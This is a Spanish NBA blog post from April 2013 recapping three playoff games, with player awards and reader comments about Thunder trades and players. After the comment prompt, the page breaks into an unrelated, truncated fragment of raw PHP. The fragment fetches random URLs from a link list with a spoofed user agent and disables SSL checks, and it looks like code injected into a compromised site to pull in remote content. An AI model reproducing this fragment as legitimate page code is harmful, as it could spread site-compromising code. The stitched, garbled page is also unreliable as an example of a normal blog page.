La crónica: Siguen vivos

30 de April de 2013 por Simon

Tres partidos se disputaron ayer en la jornada de Playoffs de la NBA. Dos equipos se jugaban mantenerse en competición y ambos lo consiguieron ganando en su casa, así que tanto Nets como Houston tendrán otra oportunidad de alargar la serie. Por su parte, Atlanta hizo los deberes e igualó la eliminatoria ante Indiana Pacers.

Brook DeronDesde el comienzo del partido en el Barclays Center ambos equipos salieron a por todas, las primeras ventajas las obtuvo Brooklyn Nets con la ayuda de la pareja López-Williams. Por su parte, Chicago era sostenido por los chispazos de genialidad de Nate Robinson. En el último cuarto, tras ir todo el partido a remolque pero con pequeñas diferencias, Chicago Bulls se vino abajo. Brooklyn Nets llegó más fresco (o más necesitado) al último cuarto y eso marcó las diferencias. A Chicago se le vio agotado y fallando muchos pases y tiros sencillos a priori. Hasta tres jugadores superaron los 40 minutos de juego Nate Robinson, Deng y Boozer, básicamente la columna vertebral de este equipo ante los problemas físicos de Noah y la ausencia de Hinrich. Esto terminó por depararnos una diferencia engañosa respecto a lo que fue el partido (91-110). Soplo de aire fresco para Brooklyn que el jueves afrontará otro match ball en contra pero esta vez en territorio Bulls. Brook López terminó el partido con 28 puntos y 10 rebotes, mientras Deron Williams anotó 23 puntos y repartió 10 asistencias.

Houston Rockets también se salvó de quedar eliminado. Y eso que tras la primera parte todo el mundo apostaría a que iban a ser barridos de estos Playoffs. Al descanso Oklahoma City Thunder dominaba por 7 puntos con la sensación de que esa diferencia no iba a hacer más que aumentar en la segunda parte después de que las ventajas durante este segundo cuarto superasen por momentos los 10 puntos. Pero un impresionante tercer cuarto de Houston, capitaneado por Chandler Parsons, le dio un vuelco completo al partido y Houston volvía a estar con ventaja al inicio del último cuarto. Rockets aguantó bien las embestidas de Oklahoma y sus Thunder y los mantuvieron a raya durante la primera parte del último cuarto. Ya en los minutos finales del partido, 5 puntos seguidos de Durant pusieron a Oklahoma a sólo dos de la victoria. En el último minuto el marcador no se movió, Durant estuvo marcado por una grandísima defensa y Harden continuó fallando lanzamientos, que prácticamente es lo que hizo durante toda la noche. En los últimos segundos Jackson primero e Ibaka después tuvieron lanzamientos para ganar el partido pero fallaron, por lo que la conclusión de la serie tendrá que esperar (103-105). Gran noche de todo el equipo de Houston, que arrimó el hombro con el claro objetivo de la victoria que finalmente consiguieron. Parsons rozó el triple doble con 27-10-8, Asik dominó los tableros con 8 rebotes ofensivos y 14 totales a los que añadió 17 puntos, Beverly (16) y Delfino (13) anotaron puntos importantísimos en momentos claves del partido e incluso Francisco García ayudó con defensas claves sobre Durant en los instantes finales. Por su parte, James Harden no tuvo su día, terminó el partido con 15 puntos pero 4/12 en el tiro y perdió la friolera de 10 balones. En Oklahoma, gran partido de Durant, bien apoyado por Jackson y Martin, pero decepcionante Ibaka, sin Westbrook debería dar un paso adelante pero ayer se quedó en 8 puntos, 5 rebotes… muy pobre su aportación.

JoshEl Atlanta-Indiana tiene pinta de convertirse en la serie más larga de la primera ronda. Ambos equipos han dominado los partidos en su casa, lo que refleja el 2-2 con el que se encuentra la eliminatoria actualmente. Tras un primer cuarto igualado, Atlanta consiguió hacer muchos ataques rápidos para sorprender a Indiana durante el segundo cuarto, y el acierto desde el triple en estático terminó de romper el partido en ese segundo cuarto. En el tercer cuarto Indiana consiguió reaccionar y limar las ventajas pero Atlanta en ningún momento permitió que esas ventajas llegaran a ser realmente inquietantes. Cuando Indiana se acercaba a unos 5-7 puntos, Atlanta volvía a estirarla hasta los 10, y ésa fue la tónica de la segunda parte hasta la conclusión (91-102). Clave la aportación de Korver y Tolliver bombardeando el aro de Indiana desde lejos con 5 y 3 triples respectivamente, lo que permitió más espacio para que Horford y sobre todo un impresionante Josh Smith tuvieran espacio para hacer de la suyas. Smith acabó con 29 puntos, 11 rebotes, 4 asistencias y 3 robos, completísimo su partido. En Indiana, dobles figuras en anotación de todo el quinteto, pero el planteamiento e intensidad de Atlanta les superó de principio a fin. La serie viaja ahora a Indiana con un pronóstico incierto, Indiana sigue siendo favorito por tener la ventaja de campo, pero Atlanta ha demostrado que perfectamente puede llevársela si Indiana hace alguna concesión en su casa.

PREMIOS

kd parsonsMVP: Josh Smith contribuyó a su stock en el mercado de agentes libres con 29 puntos, 11 rebotes, 4 asistencias, 3 robos y 1 tapón. Brook López prolongó la serie ante los Bulls con 28 puntos y 10 rebotes. También Chandler Parsons estuvo descomunal en la victoria sobre los Thunder, a los que les metió 27 puntos, 10 rebotes, 8 asistencias y 1 tapón. Pero el premio del día, si se nos permite, es para Jason Collins.

Rookie: Fundamental en la buena imagen que están dejando los Rockets en Playoffs, Patrick Beverley volvió a contribuir anoche con 16 puntos, 4 rebotes, 3 asistencias, 1 robo y 1 tapón. Veremos cómo lleva el base los abucheos que con toda seguridad le dedicarán los aficionados de los Thunder en el próximo encuentro.

Sorpresa: La baja de Granger le abrió la puerta y Stephenson no deja de contribuir. Anoche logró su mejor marca en asistencias de su carrera y rozó el triple doble con 10 puntos, 9 rebotes y 8 asistencias. Pero los Pacers perdieron, en parte por la contribución desde el banco de Korver y Tolliver, autores de 8/11 en triples.

Decepción: Pese a la victoria, James Harden estuvo negado, perdió 10 balones y se jugó tres posesiones consecutivas de mala manera que a punto estuvieron de costar la eliminación a su equipo. En el mismo partido, también decepcionó Ibaka, que sumó muy poco y no acertó en una sencilla bandeja sobre la bocina que habría forzado la prórroga.

Esfuerzo en vano: Los Pacers siguen cayendo en sus visitas a Atlanta y Paul George sigue siendo su mejor hombre. Anoche metió 21 puntos con 12 rebotes, 4 robos, 2 asistencias y 1 tapón. Pero el gran esfuerzo en vano de la noche fue el de Kevin Durant, que metió 38 puntos en sólo 16 tiros de campo y sumó 8 rebotes y 6 asistencias en la derrota de los Thunder en Houston.

TOP 5

Imágenes | AP Photos / Getty Images

Comenta

17 comentarios a esta entrada

  1. Esteban dice:
    #1

    ibaka no dara un paso al frente simplemente por que no puede, pude tirar algun tiro abierto y meter una volcada, pero no esperen que se transforme en la segunda arma ofensiva del equipo

    por otra parte, si reggie jackson sigue jugando asi, me empezaría a plantear un trade entre westbrook y cp3 o dero williams,

    atento con ese chaval

      Citar

  2. melo15 dice:
    #2

    Por un partido que haya hecho el chaval tampoco se nos ha de ir la cabeza que Westbrook es seguramente uno de los 10 jugadores mas determinantes de la NBA.

      Citar

  3. oli dice:
    #3

    No vi el partido de los thunder, por lo que parece estuvieron a punto de ganar pero a mi no me transmiten buenas sensaciones si tu jugador estrella hace un 12-16 en tiros pero tu base rookie tira más y peor, 7 de 18, es que algo no va bien puede que sea este partido en concreto pero veo a Durant muy sólo.

    Otros que no me transmiten buenas sensaciones son los pacers, pueden llegar a ganar un par de partidos a los heat y tres a los Knicks pero si fuera de su casa no suben la intensidad no les veo ganandoles na serie y de momento vas vale que se centren con los Hawks.

    Los Bulls derrota comprensible ahora tienen la oportunidad de sentenciar en casa.

      Citar

  4. Esteban dice:
    #4

    melo15:
    Por un partido que haya hecho el chaval tampoco se nos ha de ir la cabeza que Westbrook es seguramente uno de los 10 jugadores mas determinantes de la NBA.

    justamente melo, dije traspasar a westbrook por cp3 o deron williams, poca cosa no?

    westbrook, podria ser el maximo anotador de la nba en los NETS y llevarlos algo mas lejos como jugadro franquicia q deron williams, y deron por el contrario, se adaptaria mejor al papel de facilitador y segunda espada detras de durant y cerraria mejor los juegos que lo que lo hace westbrook

    todo esto porque entre deron y jackson podrian asumir los puntos que hoy anota westbrook

    es solo una apreciacionm personal

    PD: se imagen a westbrook fuera del thunder? la tabla de maximos anotadores seria una lucha de 3 entre durant, harden y westbrook jejejeje

      Citar

  5. Ruxixón dice:
    #5

    Es que a Ibaka ayer no lo buscaron,así de claro.Mismamente en la jugada del palmeo errado por él Reggie tuvo la oportunidad de doblar el balón que dejaba a Ibaka solo para realizar un mate,luego vino lo que vino,se rajó en un palmeo fácil.Reggie Jackson está asumiendo el papel de Westbrook pero a medida que pasen de ronda vamos a ver como lleva el peso de ser la segunda espada.Durant asume más protagonismo y con ello llegan las pérdidas,4 y 7 en los últimos partidos.Contra un rival que tuviera mayor control de la bola los Thunder estarían en un aprieto pero Houston peca de inexperiencia.De todas formas el mayor error de los Rockets fue no salir con otra actitud en el tercer partido,después de rozar la victoria en el 2º y sabiendo de la baja de Westbrook.

    Scott Brooks overrated clarísimo!

      Citar

  6. Jose Luis dice:
    #6

    Scott Brooks como entrenador para mí no vale nada. Se ha encontrado con un grupo increíble, donde priman la defensa los jugadores, no ha tenido que inculcar él esa defensa. Jugadores como Westbrook, Durant, Sefolosha, Ibaka, Perkins, tienen la defensa y el sacrificio en la sangre, y poco más se puede decir de Oklahoma. Transición y defensa es lo que tienen, y no veo que el entrenador haya hecho nada con ni por este equipo.

      Citar

  7. txusma dice:
    #7

    Esteban:

    PD: se imagen a westbrook fuera del thunder? la tabla de maximos anotadores seria una lucha de 3 entre durant, harden y westbrook jejejeje

    Y Carmelo…

    Justo el otro día veía que el número de jugadores con más de 20 puntos es muy pequeño, creo recordar que 11. Antes había muchos más. Parte de la culpa creo que está siendo la de aglutinar talento en menos equipos.

      Citar

  8. HisRoyalAirness dice:
    #8

    Por cierto, OJO al Parker vS Curry que se está mascando en el Oeste. Apetece

      Citar

  9. Esteban dice:
    #9

    Con la lesion de westbrook podemos coincidir q el trade de harden para el thumder es uno de los peors movimioentos de l historia de la nba

    Alguien puede explicar este movimiento? Q desastre

      Citar

  10. nba dice:
    #10

    HisRoyalAirness:
    Por cierto, OJO al Parker vS Curry que se está mascando en el Oeste. Apetece

    A ver si el tobillo de Curry permite que este muestre todo su arsenal, no hay que enterrar a Denver, pero quien iba a decir que Denver iba a echar mas de menos a Danilo que los Warriors a Lee…

      Citar

  11. MagicJohnson32 dice:
    #11

    Esteban:
    Con la lesion de westbrook podemos coincidir q el trade de harden para el thumder es uno de los peors movimioentos de l historia de la nba

    Alguien puede explicar este movimiento? Q desastre

    Los Thunder no podían pagar a Harden, es así de simple. Sin Harden han dominado la conferencia Oeste, y Westbrook no se había perdido un partido en su vida.

      Citar

  12. Esteban dice:
    #12

    Te corrigo magic, el thunder podria hberle pagado a harden este añp pues tiene contrato rookie y perderrlo a fin de año, y serian mucho. Mas candidatos con harden q con cualquier otro

    En cambio trajeron a martin, a quien si tiene grandes ofertas tampoco podran pagarle y si pide poco podrian haberlo fichaje cuando perdian a harden luego de este año

    La unica. Diferncia en todo esto era jeremy lamb a quien no han usado en todo el año y seria sorprendete si el prox año pasa a ser un jugador importante

    Yome quedababa con harden y el prox año veia, antes q matin y lamb y ver el proxio año

      Citar

  13. Denise dice:
    #13

    Esteban:
    Te corrigo magic, el thunder podria hberle pagado a harden este añp pues tiene contrato rookie y perderrlo a fin de año, y serian mucho. Mas candidatos con harden q con cualquier otro

    Ya, pero nosotros no sabemos lo que se cuece ahí adentro. Si el barbas estaba cabreado e iba a estar todo el año generando mal ambiente, pues me parece bien el traspaso, además, como dice Magicjohnson, de momento en la temporada regular no lo han echado de menos y ahora en playoffs van 3-1 y sin Westbrook.
    A mi lo que no me convence de Thunder es la poca profundidad de banquillo que tienen.

      Citar

  14. Denise dice:
    #14

    ¿Habeis visto a Bynum bailando flamenco en Madrid tras asistir al partido de Champions?

    Vaya profesional…..y todavía habrá quien le ofrezca el año que viene un contratito de 10 millones…

    http://sports.yahoo.com/blogs/nba-ball-dont-lie/watch-andrew-bynum-flamenco-dancing-spain-ferrari-jacket-021051875.html

      Citar

  15. Ruxixón dice:
    #15

    Denise:
    ¿Habeis visto a Bynum bailando flamenco en Madrid tras asistir al partido de Champions?

    Vaya profesional…..y todavía habrá quien le ofrezca el año que viene un contratito de 10 millones…

    http://sports.yahoo.com/blogs/nba-ball-dont-lie/watch-andrew-bynum-flamenco-dancing-spain-ferrari-jacket-021051875.html

    Un profesional como la copa de un pino…pero pino de esos que se plantan en los excusados.

      Citar

  16. Jose Luis dice:
    #16

    Los Grizzlies se comieron a los Clippers… una plantilla extensa pero en la que muchos jugadores son casi nulos cuando llegan los momentos importantes.

      Citar

  17. MagicJohnson32 dice:
    #17

    Esteban:
    Te corrigo magic, el thunder podria hberle pagado a harden este añp pues tiene contrato rookie y perderrlo a fin de año, y serian mucho. Mas candidatos con harden q con cualquier otro

    En cambio trajeron a martin, a quien si tiene grandes ofertas tampoco podran pagarle y si pide poco podrian haberlo fichaje cuando perdian a harden luego de este año

    La unica. Diferncia en todo esto era jeremy lamb a quien no han usado en todo el año y seria sorprendete si el prox año pasa a ser un jugador importante

    Yome quedababa con harden y el prox año veia, antes q matin y lamb y ver el proxio año

    Hombre, por supuesto, yo también me habría quedado con Harden, y sobre todo después de ver el nivel que ha tenido este año en Houston. Yo no te digo lo que opino, te digo lo que ha pasado. La franquicia tuvo que elegir el verano pasado entre Ibaka y Harden, y prefirieron atar a Ibaka. Y luego está lo que comenta Denise sobre el tema vestuario. Harden se llevaba muy bien con Durant y Westbrook pero no estaba contento con Brooks y con el rol que le daba.

    Y lo vuelvo a decir. A mí me encanta Harden y no me gusta Kevin Martin, pero el equipo ha funcionado a la perfección todo el año y era clarísimo favorito del Oeste hasta que se rompió Westbrook.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>